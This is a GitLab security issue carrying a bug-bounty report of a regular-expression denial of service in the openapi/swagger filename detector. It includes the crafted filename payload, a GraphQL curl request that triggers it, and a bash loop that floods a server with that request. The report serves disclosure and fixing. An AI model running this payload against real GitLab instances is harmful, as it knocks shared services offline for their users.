ReDoS in openapi filename due to bad regexp in lib/gitlab/file_detector.rb

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2370737 by joaxcar on 2024-02-11, assigned to GitLab Team:

Report | How To Reproduce

Report

Summary

When rendering blobs from files (for example, through GraphQL), gitlab will look for special filenames to handle in special ways. There is a list of regexps in lib/gitlab/file_detector.rb to help with detecting the files. One of the filetype that GitLab tries to detect is openapi.yml or swagger files. The regexp used for this looks like this

/[^/]*(openapi|swagger)[^/]*\.(yaml|yml|json)\z/

this regexp is subject to catastrophic backtracking. A filename with this pattern will cause the regexp to break

'e'.repeat(1041) + 'openapi'.repeat(1041) + '/swagger.yml'

An attacker can create a malicious file and then run a series of GraphQL queries like this (replacing REGEXPNAME with the bad filename)

curl 'http://20.236.120.94/api/graphql' \  
  -H 'Content-Type: application/json' \  
  --data-raw $'{"query":"query getBlobInfo($projectPath: ID\u0021, $filePath: String\u0021, $ref: String\u0021, $refType: RefType, $shouldFetchRawText: Boolean\u0021) {project(fullPath: $projectPath) {repository {blobs(paths: [$filePath], ref: $ref, refType: $refType){nodes{rawTextBlob [@]include(if: $shouldFetchRawText),fileType}}}}}\\n","variables":{"projectPath":"root/test","filePath":"REGEXPNAME","ref":"main","refType":null,"shouldFetchRawText":true},"operationName":"getBlobInfo"}' \  
  --compressed \  
  --insecure

On a public project you can do these requests unauthenticated, but as I understand the file needs to exists for the query to break due to backtracking.

I have tested this on a 1k example architecture and made the server unresponsive with 1 request a second.

Steps to reproduce

Use a local hosted Gitlab server

Log in to Gitlab
Create a new project (or use an existing one), make it public (for ease of attack)
Create a file with this file name (can be empty)

eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapi/swagger.yml

To exhaust the server, run this script in a terminal (change the URL variable and the GROUPNAME/PROJECTNAME in the query to match your setup)

###  !/bin/bash

###  URL to which the curl request will be made  
URL="https://gitlab.example.com"

###  Duration for the loop to run: 1 minutes (60 seconds)  
DURATION=60

###  Start time  
START_TIME=$(date +%s)

###  Loop until the duration is reached  
while [ $(($(date +%s) - START_TIME)) -lt $DURATION ]; do  
    # Make the curl request  
       curl "http://$URL/api/graphql \  
  -H 'Content-Type: application/json' \  
  --data-raw $'{"query":"query getBlobInfo($projectPath: ID\u0021, $filePath: String\u0021, $ref: String\u0021, $refType: RefType, $shouldFetchRawText: Boolean\u0021) {project(fullPath: $projectPath) {repository {blobs(paths: [$filePath], ref: $ref, refType: $refType){nodes{rawTextBlob [@]include(if: $shouldFetchRawText),fileType}}}}}\\n","variables":{"projectPath":"GROUPNAME/PROJECTNAME","filePath":"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapi/swagger.yml","ref":"main","refType":null,"shouldFetchRawText":true},"operationName":"getBlobInfo"}' &

    # Wait for 1 second  
    sleep 1  
done

SSH into the gitlab server and use top or htop to view the CPU usage

Impact

DOS of gitlab instance and exhaustive resource consumption

What is the current bug behavior?

A malicious filename will make the regexp go into catastrophic backtracking.

What is the expected correct behavior?

Any filename should be safe

Impact

DOS of gitlab instance and exhaustive resource consumption

How To Reproduce

Please add reproducibility information to this section: